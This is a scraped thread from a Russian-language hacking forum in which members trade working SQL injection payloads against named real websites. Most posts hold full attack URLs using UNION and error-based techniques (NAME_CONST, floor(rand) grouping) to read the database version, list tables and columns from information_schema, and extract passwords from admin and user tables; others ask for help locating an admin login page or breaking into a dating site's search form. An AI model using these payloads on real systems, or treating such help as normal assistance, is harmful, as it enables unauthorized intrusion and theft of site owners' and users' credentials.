Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Какая версия, каким запросом у тебя получилось ее определить и что ты увидел на странице ?
     
    2 people like this.
  2. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Вероятно, вот тут https://forum.antichat.ru/thread119047-%C1%FB%F1%F2%F0%FB%E9.html
     
    1 person likes this.
  3. KREGI

    KREGI Banned

    Joined:
    9 Feb 2009
    Messages:
    42
    Likes Received:
    3
    Reputations:
    1
    http://www.site.ru/index.php?id=106 and substring(@@version,1,1)=5
    без ошибок - следовательно 5 версия.
    R1dex мне подсобил уже с этой скулей,
    вот такой запрос работает
    24 and 1=0 union select 1,2,3,4,5,6,7,9,null,10

    Собственно вот:
    http://www.mibf.ru/index.php?id=24 and 1 =0 union select 1,2,3,4,5,6,7,9,0x3a,10-- 1
    сейчас проверил, оказалось его уже вскрыли раньше меня :D
     
    #15143 KREGI, 20 Oct 2010
    Last edited: 20 Oct 2010
  4. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    вот такая трабла:

    http://www.koisite.info/view_profile1.php?user=-2653%27+union+select+version%28%29+from+admin+limit+0,1+--+

    выводит версию в строку - 2004-00-27 даты

    то есть вывод числовых значений без проблем

    теперь пробуем вывести имя:

    http://www.koisite.info/view_profile1.php?user=-2653'+union+select+loginname+from+admin+limit+0,1+--+

    выводит 0000-00-00

    думал попробовать покрутить через подзапросы, не не тут то было

    http://www.koisite.info/view_profile1.php?user=2653%27+and%20substring%28version%28%29,1,1%29=4+--+

    выводит профиль

    http://www.koisite.info/view_profile1.php?user=2653%27+and+ascii%28substring%28%28select%20pwd%20from%20admin+limit+0,1%29,1,1%29%29%3E0+--+

    ругается и обрезает все что идет до select

    http://www.koisite.info/view_profile1.php?user=2653%27+and+ascii%28substring%28%28/*!select*/%20pwd%20from%20admin+limit+0,1%29,1,1%29%29%3E0+--+

     
  5. MastaBass1

    MastaBass1 Member

    Joined:
    25 Dec 2009
    Messages:
    61
    Likes Received:
    13
    Reputations:
    2
    Помогите раскрутить слепую sql:
    http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select pass FROM users LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select pass FROM users LIMIT 1), 14)e) b)a--+
    Не выводит не одно из полей, не login, не password, ничего короче, помогите пожалуйста.
     
  6. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.ollis.ru/index.php?rest=1')+or+1+group+by+concat(version(),floor(rand(0)*2))having+min(0)+or+1--+

    Duplicate entry '5.0.221' for key 1
     
    _________________________
  7. MastaBass1

    MastaBass1 Member

    Joined:
    25 Dec 2009
    Messages:
    61
    Likes Received:
    13
    Reputations:
    2
    Я это знаю, как до значений таблицы дойти, пароли нужны)
     
  8. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    2MastaBass1:

    Ну так.. Table 'ollis.users' doesn't exist

    Ищи свою табличку в другой бд..
     
  9. MastaBass1

    MastaBass1 Member

    Joined:
    25 Dec 2009
    Messages:
    61
    Likes Received:
    13
    Reputations:
    2
    Это тоже знаю, так как ее найти, перебором?
     
  10. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://ollis.ru/index.php?id=S00000645')+union+select * FROM (select * FROM (select NAME_CONST((select table_name FROM information_schema.tables+where+table_schema=database() LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select table_name FROM information_schema.tables+where+table_schema=database() LIMIT 1), 14)e) b)a--+&type=ollis_picture&action=&mode=popup

    перебирай лимит ом
     
    _________________________
  11. MastaBass1

    MastaBass1 Member

    Joined:
    25 Dec 2009
    Messages:
    61
    Likes Received:
    13
    Reputations:
    2
    Просто лимит 1 потом 2 и т.д.? Не догнал...

    Делаю так

    http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select user FROM _access LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select user FROM _access LIMIT 1), 14)e) b)a--+

    гонит Unknown column 'user' in 'field list'
    побывал и логин и много чего
     
    #15151 MastaBass1, 20 Oct 2010
    Last edited: 20 Oct 2010
  12. gabarea

    gabarea New Member

    Joined:
    30 Mar 2010
    Messages:
    30
    Likes Received:
    2
    Reputations:
    1
    http://comunidad.encuentra24.com/browse_businesses_locations.php?businesscat_id=10
     
  13. boxazbox

    boxazbox Banned

    Joined:
    21 Sep 2010
    Messages:
    9
    Likes Received:
    3
    Reputations:
    6
    и что ?
     
  14. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19

    Хватит уже тыкать таблицы и колонки наугад. У тебя 5-ая ветка, ничего подбирать не надо, просто почитай хоть одну статью...

    Колонки в таблице _access

    http://ollis.ru/index.php?id=S00000645')+union+select * FROM (select * FROM (select NAME_CONST((select column_name FROM information_schema.columns+where+table_name=0x5f616363657373 LIMIT 0,1), 14)d) as t JOIN (select NAME_CONST((select column_name FROM information_schema.columns+where+table_name=0x5f616363657373 LIMIT 0,1), 14)e) b)a--+&type=ollis_picture&action=&mode=popup

    Ну и:

    http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select user_id FROM _access LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select user_id FROM _access LIMIT 1), 14)e) b)a--+
     
  15. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    127
    Likes Received:
    9
    Reputations:
    1
    Странная скуля, даже кол-во полей подобрать немогу.
     
  16. aka_zver

    aka_zver Elder - Старейшина

    Joined:
    17 Sep 2009
    Messages:
    471
    Likes Received:
    330
    Reputations:
    73
    1 person likes this.
  17. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    помгите найти админку nll.com =)
     
  18. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    nll.com/horde/imp/login.php
     
    1 person likes this.
  19. hakrat

    hakrat New Member

    Joined:
    26 Sep 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Нужна помощь,здесь есть иньекция

    http://steroidanabolic.com/phpBB/privmsg.php?mode='%22%5C'%5C%22);|]*{%0d%0a%3C%00%3E&u=186

    http://steroidanabolic.com/phpBB/viewforum.php?f=1&start=-268435455
     
  20. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    ну лан палит то палим линк главное найти хот какую решение:

    http://www.nz.adultxdating.com/search_get.html
    POST
    txt_user_sex=2&txt_agefrom=20&txt_ageto=25&search_submit.x=52&search_submit.y=14&sel_state_id=12&txt_seeking_sex%5B%5D=1'

    Это уже посмотрел профи и пока ниче может народ что скажет (много мозгов)? В первые встречаю такой гемор.
     
Thread Status:
Not open for further replies.